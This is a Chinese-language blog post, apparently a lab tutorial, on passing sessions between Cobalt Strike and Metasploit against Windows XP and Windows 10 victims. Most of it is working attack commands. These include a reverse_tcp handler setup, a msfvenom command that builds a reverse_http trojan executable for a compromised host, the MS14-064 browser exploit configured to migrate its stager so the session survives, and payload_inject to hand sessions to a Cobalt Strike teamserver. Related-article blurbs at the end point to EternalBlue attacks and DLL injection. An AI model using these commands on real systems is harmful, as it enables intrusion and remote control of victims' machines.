Cobalt Strike(五)会话管理

已于 2022-09-21 16:04:11 修改
阅读量1k 收藏
点赞数 1
分类专栏: cobaltstrike 安全工具 安全 文章标签: linux 运维 服务器
于 2022-09-20 17:12:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/126953675
版权
安全 同时被 3 个专栏收录
98 篇文章 12 订阅
订阅专栏
安全工具
35 篇文章 4 订阅
订阅专栏
cobaltstrike
19 篇文章 8 订阅
订阅专栏

测试环境

系统

服务

ip

kali

teamserver

192.168.1.53

kali

metasploit

192.168.1.109

xp

victim

192.168.1.104

win10

victim

192.168.1.106

会话管理

1.cobalt strike派生会话

自身增加会话

或者在其他的teamserver 做备份会话

直接派生会话然后选择监听器即可

 结果

2.cobalt strike派生metasploit会话

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.109

lhost => 192.168.1.109

msf5 exploit(multi/handler) > set lport 4444

lport => 4444

msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

新建外部监听器

因为metasploit用的tcp 所以这跟协议也用tcp

 

执行过后就会msf里面产生会话session

3.metasploit 生成木马与cobalt strike会话

这里用的是http协议

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.53 LPORT=8808 -f exe > /tmp/shell1.exe

 在cobalt strike 监听器

把msf生成的木马文件拿到肉鸡上去执行就会返回一个会话

4.metasploit使用溢出exp与cobalt strike会话

use exploit/windows/browser/ms14_064_ole_code_execution

st srvhost 192.168.1.109

set SRVPORT 80

set payload windows/meterpreter/reverse_http

set LHOST 192.168.1.109

set lport 8808

set disablepayloadhandler True

set PrependMigrate true

exploit

set disablepayloadhandler True

将DisablePayLoadHandler设置为true。这告诉metasploit框架,它不需要在metasploit框架内创建处理程序来服务有效负载连接。

set PrependMigrate true

这个选项告诉metasploit框架修改其stager,以便在利用之后立即迁移到另一个进程。此选项对于客户端攻击非常重要。它允许您的会话在被利用的应用程序崩溃或关闭时存活。

当xp系统的受害人用浏览器访问http://192.168.1.109/ssGTEYEEghxOvc
这个带有攻击代码的链接时候,成功的话就会在cobalt strike 产生一个会话

5 .metasploit session 派生会话给cobalt strike

首先产生session

use exploit/windows/browser/ms14_064_ole_code_execution

set srvhost 192.168.1.109

set SRVPORT 80

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.109

set lport 4444

exploit

 

use exploit/windows/local/payload_inject

set session 1

set payload windows/meterpreter/reverse_http

set lhsot 192.168.1.53(teamserver的主机)

set lport 8888(监听器ip)

set DisablePayloadHandler true

exploit -j

 ———————————————————————————————————不留遗憾的活着

夜yesec
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Cobalt Strike会话管理
f_carey的博客
01-06 457
Cobalt Strike会话管理1 增加 CS 会话2 利用 CS 会话生成 MSF 会话3 利用 msfvenom 生成的文件生成 MSF 会话4 利用 MSF 会话生成 CS 会话 1 增加 CS 会话 添加新侦听器 在获得的 session 会话中选择"新建会话(spawn)":选择新添加的侦听器 获取到新的会话 2 利用 CS 会话生成 MSF 会话 添加新外部侦听器 配置 MSF 如下 msf6 > use exploit/multi/handler
Cobalt Strike 会话管理
yyj1781572的博客
11-17 433
Cobalt Strike 会话管理
CobaltStrike使用-第二篇(攻击模块、会话管理、CS-MSF联动)
Love&Share
11-30 2068
文章目录攻击用户驱动攻击用户截屏进程管理文件管理远程VNC浏览器代理用户发现&端口扫描视图会话管理会话传递相关命令CS派生会话CS派生MSF会话MSF木马->CS会话MSFexp->CS会话MSFsession派生到CS 攻击 当我们拿到Victim的Beacon之后就要进行攻击,CS中提供了很多攻击模块,接下来介绍常见使用方法 用户驱动攻击 用户截屏 在目标中选择屏幕截图即可获取截图,截图会在视图->屏幕截图中显示 因为默认会话60秒返回一次,所以再执行操作60秒之后会得到.
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】
AA8j的博客
06-29 293
会话管理 1.CS会话派生到CS 首先新建一个监听器用于监听派生的会话 右键要派生的会话点击spawn 然后选择派生到刚刚新建的监听器上,点击choose即可。 也可以先连接其它cs服务器新建监听器,将会话派生到其它cs服务器上 2.CS会话派生到MSF 开启MSF监听: 在CS上创建监听器并指向MSF监听的地址: 通过Spawn将已有会话派生到新创建的监听器中: 可以看到会话成功派生到了MSF上: 3.MSF派生CS会话 1.生成木马直接回连到CS CS新建
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
cobaltstrike中文版.zip
05-17
cobaltstrike中文版.zip
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ...2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟...团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
cobalt strike 4.7
06-07
cobalt strike 4.7
BOF-DLL-Inject:使用Cobalt Strike的信标目标文件实现手动Map DLL注入
04-14
BOF-DLL-注入 BOF DLL注入是一个自定义的,该使用手动映射DLL注入以便将dll全部从内存迁移到进程中。 好处 不太可能被签名 DLL有效负载保留在内存中,永不接触磁盘 附加功能易于实现 DLL未在内核领域注册为包括EPROCESS结构的模块 笔记 要了解我如何开发此工具以及有关该工具的更多信息,请参阅我的博客
MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击
da_chuan_chuan的博客
04-27 1534
文章目录前言一、将CS会话派生给MSF1、前期准备:2、Cobaltstrike派生会话给MSF二、MSF进行内网攻击1、前言:2、攻击步骤如下三、将MSF中的会话派生给CS1、前言2、使用步骤:总结 前言 本文主要介绍MSF与CobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。 当前网络设置为: 一、将CS会话
内网渗透神器CobaltStrike会话管理()
xf555er的博客
11-21 480
将CS1管理会话派生至CS2中, 简单来说就是将CS1服务器的肉鸡送给CS2服务器
cobalt strike 会话转移
Armandhe的博客
06-22 2333
纯属笔记
Cobaltstrike系列教程(六)文件/进程管理与键盘记录
J0o1ey Blog
08-09 5838
0x000-前文 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-文件管理 ①基础管理 选择一个会话,右键,目标–>文件管理 Upload为上传一个文件 ,Make Directory为创建文件夹,List Drives为列出盘符,refresh为刷新,这块很简单,就不一一讲了。 ②下载文件 ...
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 4569
在这篇文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
【CS学习笔记】9、Metasploit框架
TeamsSix 的 CSDN 空间
06-19 538
0x00 客户端的漏洞利用 如果想使用MSF对目标进行漏洞利用,再通过这个漏洞来传输Beacon的话,也是可以的。 1、首先在MSF上选择攻击模块 2、接着在MSF上设置Payload为windows/meterpreter/reverse_http或者windows/meterpreter/reverse_https,这么做是因为CS的Beacon与MSF的分阶段协议是相兼容的。 3、之后在MSF中设置Payload的LHOST、LPORT为CS中Beacon的监听器IP及端口。 4、然后设置 Disab
Cobalt Strike使用教程
huangyongkang666的博客
04-03 5932
Cobalt Strike使用教程 1.CS简介 ​ Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器,是域渗透,内网渗透,内网漫游,后渗透手段利器,但前提是获得一台主机的shell。早期版本CobaltSrtike依赖Metasploit框架,而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作 ​ Cobalt Strike集成了端口转发、扫
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3802
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
Cobalt Strike安装
最新发布
08-24
您将获得一个名为"cobaltstrike.jar"的Java可执行文件。 4. 确保您的系统已经安装了Java Runtime Environment(JRE)。如果没有安装,请先安装JRE。 5. 打开命令行终端,并导航到cobaltstrike.jar所在的目录。 6....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值